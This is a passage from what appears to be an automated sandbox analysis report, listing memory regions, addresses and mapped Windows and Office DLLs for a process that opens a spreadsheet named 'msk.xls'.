filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 643
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 644
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 645
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 646
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 647
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 648
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 649
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 650
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 651
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 652
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 653
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 654
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 655
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 656
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 657
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 658
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 659
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 660
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 661
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 662
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 663
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 664
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 665
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 666
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 667
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 668
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 669
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 670
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 671
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 672
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 673
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 674
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 675
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 676
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 677
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 678
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 679
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 680
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 681
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 682
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 683
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 684
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 685
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 686
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 687
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 688
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 689
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 690
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 691
start_va = 0x70650000
end_va = 0x719a5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 692
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui")
Region:
id = 693
start_va = 0x8dd0000
end_va = 0x8dd1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "networkexplorer.dll.mui"
filename = "\\Windows\\System32\\en-US\\NetworkExplorer.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\networkexplorer.dll.mui")
Region:
id = 694
start_va = 0x7fef4d50000
end_va = 0x7fef4dc2fff
monitored = 0
entry_point = 0x7fef4dac7f8
region_type = mapped_file
name = "ieproxy.dll"
filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll")
Region:
id = 695
start_va = 0x8de0000
end_va = 0x8deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008de0000"
filename = ""
Region:
id = 696
start_va = 0x70650000
end_va = 0x719a5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 697
start_va = 0x8df0000
end_va = 0x8df0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui")
Region:
id = 698
start_va = 0x7fef7650000
end_va = 0x7fef773dfff
monitored = 0
entry_point = 0x7fef76512a0
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 699
start_va = 0x8df0000
end_va = 0x8df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008df0000"
filename = ""
Region:
id = 700
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 701
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 702
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 703
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 704
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 705
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 706
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 707
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 708
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 709
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 710
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 711
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 712
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 713
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 714
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 715
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 716
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 717
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 718
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 719
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 720
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 721
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 722
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 723
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 724
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 725
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 726
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 727
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 728
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 729
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 730
start_va = 0x8e00000
end_va = 0x8e01fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e00000"
filename = ""
Region:
id = 731
start_va = 0x8e10000
end_va = 0x8e18fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e10000"
filename = ""
Region:
id = 732
start_va = 0x8e20000
end_va = 0x8e22fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e20000"
filename = ""
Region:
id = 733
start_va = 0x8e30000
end_va = 0x8e32fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e30000"
filename = ""
Region:
id = 734
start_va = 0xac00000
end_va = 0xacfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ac00000"
filename = ""
Region:
id = 735
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 736
start_va = 0x9260000
end_va = 0x92b5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shellstyle.dll"
filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll")
Region:
id = 737
start_va = 0x9260000
end_va = 0x92b5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shellstyle.dll"
filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll")
Region:
id = 738
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 739
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 740
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 741
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 742
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 743
start_va = 0x7fef9280000
end_va = 0x7fef92bafff
monitored = 0
entry_point = 0x7fef92822f0
region_type = mapped_file
name = "winmm.dll"
filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll")
Region:
id = 744
start_va = 0x8e40000
end_va = 0x8e41fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e40000"
filename = ""
Region:
id = 745
start_va = 0x8e50000
end_va = 0x8e50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e50000"
filename = ""
Region:
id = 746
start_va = 0xb730000
end_va = 0xb82ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b730000"
filename = ""
Region:
id = 747
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 748
start_va = 0x8e50000
end_va = 0x8e50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e50000"
filename = ""
Region:
id = 749
start_va = 0x8e50000
end_va = 0x8e50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e50000"
filename = ""
Region:
id = 750
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 751
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 752
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 753
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 754
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 755
start_va = 0x7fefb1b0000
end_va = 0x7fefb1c7fff
monitored = 0
entry_point = 0x7fefb1b1010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 756
start_va = 0xb490000
end_va = 0xc48ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000b490000"
filename = ""
Region:
id = 757
start_va = 0xc490000
end_va = 0xcad2fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "msk.xls3f5401265b8fe4bb0c8a645914b45b850a13dfaa5ec313ec8e108b2c5xls14b45b850a13dfaa5ec313ec8e108b2c5xls"
filename = "\\Users\\kEecfMwgj\\Desktop\\msk.xls3f5401265b8fe4bb0c8a645914b45b850a13dfaa5ec313ec8e108b2c5xls14b45b850a13dfaa5ec313ec8e108b2c5xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\msk.xls3f5401265b8fe4bb0c8a645914b45b850a13dfaa5ec313ec8e108b2c5xls14b45b850a13dfaa5ec313ec8e108b2c5xls")
Region:
id = 758
start_va = 0x3b30000
end_va = 0x3b30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003b30000"
filename = ""
Region:
id = 759
start_va = 0xc490000
end_va = 0xcad2fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "msk.xls"
filename = "\\Users\\kEecfMwgj\\Desktop\\msk.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\msk.xls")
Region:
id = 760
start_va = 0xa510000
end_va = 0xa5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 761
start_va = 0xad00000
end_va = 0xae3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ad00000"
filename = ""
Region:
id = 762
start_va = 0x7fef4c50000
end_va = 0x7fef4c75fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 763
start_va = 0x7fef4c20000
end_va = 0x7fef4c45fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 764
start_va = 0x4ba0000
end_va = 0x4bc5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 765
start_va = 0xc490000
end_va = 0xd7e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 766
start_va = 0x3b40000
end_va = 0x3b40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui")
Region:
id = 767
start_va = 0x3b90000
end_va = 0x3b90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b90000"
filename = ""
Region:
id = 768
start_va = 0xd7f0000
end_va = 0xdcc4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000d7f0000"
filename = ""
Region:
id = 769
start_va = 0x3b50000
end_va = 0x3b51fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b50000"
filename = ""
Region:
id = 770
start_va = 0x41b0000
end_va = 0x41b1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041b0000"
filename = ""
Region:
id = 771
start_va = 0x41d0000
end_va = 0x41d2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041d0000"
filename = ""
Region:
id = 772
start_va = 0x4ae0000
end_va = 0x4ae1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ae0000"
filename = ""
Region:
id = 773
start_va = 0x4b00000
end_va = 0x4b01fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 774
start_va = 0x4b10000
end_va = 0x4b10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 775
start_va = 0x4ba0000
end_va = 0x4ba1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ba0000"
filename = ""
Region:
id = 776
start_va = 0x4bb0000
end_va = 0x4bb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 777
start_va = 0x4bc0000
end_va = 0x4bc1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 778
start_va = 0xdcd0000
end_va = 0xec9ffff
monitored = 1
